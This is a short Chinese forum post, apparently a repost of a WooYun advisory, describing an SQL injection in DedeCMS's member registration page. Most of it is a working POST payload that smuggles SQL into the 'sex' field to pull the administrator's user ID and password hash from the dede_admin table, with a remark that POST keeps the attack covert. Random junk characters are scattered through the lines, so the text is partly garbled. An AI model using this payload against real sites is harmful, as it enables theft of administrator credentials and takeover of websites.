漏洞类型: SQL注射漏洞
4 L9 M2 x1 Q5 Q简要描述:
4 P6 b1 s! K# Y% s$ I ' s8 J" u" F* T: B5 x4 d
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.* I4 j) F. ^% m, H# ]* K- @0 Z
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.% i: o9 l7 w) ^* q
详细说明:跟这个漏洞
* P/ |- V/ A6 X. u8 x 3 w% C3 C' Q: ^
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
) q. S) E0 s8 f; A$ ~# P是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的., R$ b+ P( \0 h5 \7 a O$ n
POST提交以下数据,其实不用POST提交的,这样隐蔽点.) l# K9 J% T9 t; f9 N
5 U: z L3 s5 w$ Vwww.political-security.com/member/reg_new.php
" I8 n# @. U7 Z% ~( t& V! |
- r7 w7 d7 X+ A" U2 D- Y/ D/ k/ {POST1 G" u: F; L; Q& R
- o4 V7 F* t5 Q' m/ C1 Y
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
+ |+ @7 ~6 N9 b0 S- q. u$ s8 L% zuserid=c4rp3nt3r&uname=c4rp3nt3r
* a! x0 m% E7 b, [&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
3 D2 I _8 {( r8 Q$ Y( m }" I# }&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
0 s" {5 z/ G+ \8 @- E% d(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
8 f9 k. I. G* u6 Y%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对